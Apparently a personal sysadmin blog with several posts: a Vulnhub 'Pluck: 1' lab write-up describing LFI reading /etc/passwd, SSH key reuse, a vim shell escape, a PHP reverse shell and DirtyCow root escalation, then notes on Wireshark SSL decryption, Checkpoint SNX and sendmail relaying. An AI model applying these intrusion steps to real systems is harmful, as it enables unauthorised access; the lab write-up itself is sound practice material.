Tag

pluck: 1 – Writeup

Getting ready for NetWars later this month it was time to sharpen my game. Let’s pick the first good Vulhub vm and have a go. Pluck: 1 – looked like a good start, no info what so ever.. lets see how it goes.

First let’s run a nmap and discover what service we have to deal with.

Okey, we’ve got a web server, and mysql? Let’s look at what webpage we have.

Looks like a bootstrap theme, and by clicking around I can see it’s using ?page=filename.php
This smells like LFI, quickly grab /etc/passwd to verify.

Look a the last line, that looks interesting…..
backup-user:x:1003:1003:Just to make backups easier,,,:/backup:/usr/local/scripts/backup.sh

Could there be a tftp server here as well? I know the filename I’m looking for, this should be a quick win.

By extracting the backup.tar file I’ve got a backup of the /home/ directory and /var/www/html

Quick side note, they are trolling the SQLi guys.. When ever you input the escape charc in admin.php You will get something that looks like a sql error message.

Back on track, let’s see what we have at the home directory. Paul is a user with a lot of keys. Check them all, and maybe we get lucky once more.

By using id_key4 I could log in as user paul without a password. I tested all other combination for know users (source /etc/passwd), but with no luck. The paul user was limited to pdmenu.

Here I got a little bit stuck. I looks like it was possible to do some escaping from “Edit file” meny, or even from the “www” (lynx), but no luck. There must be some basic protection within the pdmenu that prevents normal escape routines to work. Using the Directory listning and change directory I could move around and look at the file system but it was way to to slow, and you had to type/remember your path and files. After trying it out a bit, it was time to move on, let’s get a shell. I could use the edit file option and run Local-File-Inclusion to get me a www-user shell.

## Update ##
During some playing with another shell escape. My normal escape with :!/bin/bash would not work as an escape from the Edit file menu.
But by using the alias command :set shell=/bin/bash and invoking it with the :shell I could have skipped the php shell LFI workaround…

 

Dump pentest monkey php revereshell to /tmp and used LFI to get shell.

After running the most basic private escalation, and going back to the backup folder (It looks like the user bob had some sudo rights..) I start looking for kernel exploits. DirtyCow should work on this version, and they did have gcc on it. But missing some libs, and without a proper shell. Booting up a Ubuntu 16.10 64bit Server VM and build/test it there. And I’m glad I did it, cause dirtycow is unstable, and you have to be fast to input the magic line of “echo 0 > /proc/sys/vm/dirty_writeback_centisecs” otherwise the system will crash, and a reboot is necessary. Build/test and upload to target.

And that’s it.. I’ve got ROOT, and time to claim my flag.

This was a fun little evening session, but I do however think there is other ways getting in and around the system. But I’ll leave that for the next victime of pluck:1.

 

 

 

Wireshark – Passiv SSL Decrypt

There are two ways of doing SSL decrypt, one where you are in control of the end-client, and has the possible to capture the complete key exchange. This is the only way to decrypt cipher with DH in the name. The other is the passive way, and you might have a pcap of traffic and you have the private key.

This is quick tutorial on passive decrypt with private key.

If you want to try it yourself, you can start with the LAMP stack VM provided by Turnkey.
Lampstack @ turnkeylinux.com

You only need to change one part, disabling ciphers an pick one you know you can do passive decrypt on. If you have a working web server with SSL, disabling cipher with DH in the name should be enough.

File: /etc/apache2/mods-enabled/ssl.conf

## Disable all CipherSuite execpt the one we want.
-SSLCipherSuite ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES128-SHA:ECDHE-ECDSA-AES256-SHA:ECDHE-ECDSA-AES128-SHA256:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA:ECDHE-RSA-AES256-SHA:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-RSA-AES256-GCM-SHA384:DHE-RSA-AES128-SHA:DHE-RSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES256-SHA256
+SSLcipherSuite AES128-SHA

Remove the line in red, and add the line in green, and restart apache.

Now you should get the private key used. This need to be added to Wireshark.
Edit->Preference
Under protocols you should select SSL.

A debug file is smart to add, this way you can go through and find out what is happening if it doesn’t succeed. But you just create an empty file, and put it into the (Pre)-Master-Secret log filename.

The private key needs to have a .pem ending and needs to look something like this. From the LAMP stack, this can be extracted from the /etc/ssl/private/cert.pem

—–BEGIN PRIVATE KEY—–
-MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQDgGR9EXjHqFjkq
….
3Na3f/8fjxGq+A7axImJVyk=
—–END PRIVATE KEY—–

Then you can add it to the RSA keys list. The IP address can use “any” or use the server IP of the server your trying to decrypt traffic from. Port in this scenario should be 443 (https) and the protocol is http.

When you close all windows, wireshark will try to decrypt the traffic.
Follow TCP stream is not smart, but use Follow http stream work really good.

Here you can clearly see we have http request / respons in clear http format.

One quick note, if you have problem. After the keys has been added to wireshark. Try reopen the pcap. Go back to the SSL option page and just press ok, this should trigger a decrypt process… I’ve seen a couple of time where wireshark is having problem and everything just fails even if you done everything correctly.

Wireshark – export cert

Recently I’ve been working a lot with Wireshark, and in one scenario I had to verify what certificate was used. Exporting the public certificate from a Wireshark it’s pretty easy if you know what to do.

First you need to capture the handshake. If you do see the Client/Server Hello messages but no Certification, you are probably seeing a resumed SSL session. You need to get the initial handshake.

If you do get the Certificate message, you can expand the Secure Sockets Layer to reach the cert.

The full certification chain will be display, but you are probably interested in the first. Right click on the line and choose “Export Packet Bytes..”

Save the file as a “cert.der” The data will be save in binary format.

By using the openssl suit you can now convert in to a bit more human readable format.

openssl x509 -inform der -in cert.der -out cert.pem
openssl x509 -in cert.pem -text -noout

Or the last to show a print out of the certificate.

Source Capture Cert: https://www.wireshark.org/lists/wireshark-users/201003/msg00080.html
Source Convert Cert: https://www.sslshopper.com/article-most-common-openssl-commands.html

 

Checkpoint SNX Office mode – MBA – Linux – JAVA FREE!

I’ve doing this PoC for a customer, and it’s been such a long case I just need to share the essentials. It looks like a lot of people are getting there help from http://kenfallon.com/checkpont-snx-on-ubuntu-14-04-lts-trusty-tahr/

This works find if you use the IPSec VPN blade. But NOT if your using the Mobile Access Blade.
And I see a lot questions about the SNX CLI version 80007075 build, this you can get from sk90240.

Well if you ever gonna try getting SNX CLI up and running with the Mobile Access Blade. Here is quick walktrough.

  • Add a user
  • Add a user group and and the newly created user
  • Activate the Mobile Access Blade (Wizzard style)
    • Activate (See picture bellow)
      • WEB (SSL VPN Portal)
      • Mobile Devices -> Capsule VPN / Connect (This fix the auth problems)
      • Desktop / Laptops -> Checkpoint mobile for Windows (This fixes the office mode issues)
    • Change your portal to your public ip or dnsname
    • Keep the world clock demo app
    • Skip active directory setup
    • Add UserGroup you created earlier.
  • Create a rule in the normal firewall policy with source “CP_default_Office_Mode_Addresses_pool”
  • Save and push

Get your SNX client from  sk90240.
Chmod and install

 

Time to connect! 🙂

If you do getting something like this:

Check Point’s Linux SNX
build 800007075
Please enter your password:
error ‘expected open paren’ in state 1 depth 0

This means you have not activated the correct checkbox on the Mobile Access Blade

If your getting “Failed to decrypt password”

You are probably using another client then 800007075, get the correct from sk90240.

Quick and dirty post, just to get the essentials and for future reference.

And happy dance, since we now have a linux vpn client for Checkpoint without JAVA! 😀

FreeBSD – Sendmail – Static relay

This is something I’m gonna forget, and as I use this blog as my personal notebook, I need to document this.

I’ve had strange issues not being able to send mail from my web server, to a specific domain. Been troubleshooting with the hosting company, and they have tried to whitelist me, but without any luck. They do however have another smtp server witch does not include the same spam filter. But how can I redirect traffic there, without changing public DNS?

Force sendmail to static relay to host for a spesfict domain.


root@xxx:/etc/mail # cat mailertable
# $FreeBSD: releng/10.1/etc/mail/mailertable.sample 58193 2000-03-18 06:38:23Z rwatson $
#
# List of domains (possibly wildcarded) and destination mailers
#
static-domain.com smtp:smtp.somemailserver.com

After modifying the file, run a “make” withing the /etc/mail directory.


root@xxx:/etc/mail # make
...
/usr/sbin/makemap hash mailertable.db < mailertable chmod 0640 mailertable.db

Perfect, looking at /var/log/maillog I can now see that the email is forward directly to my static relay server.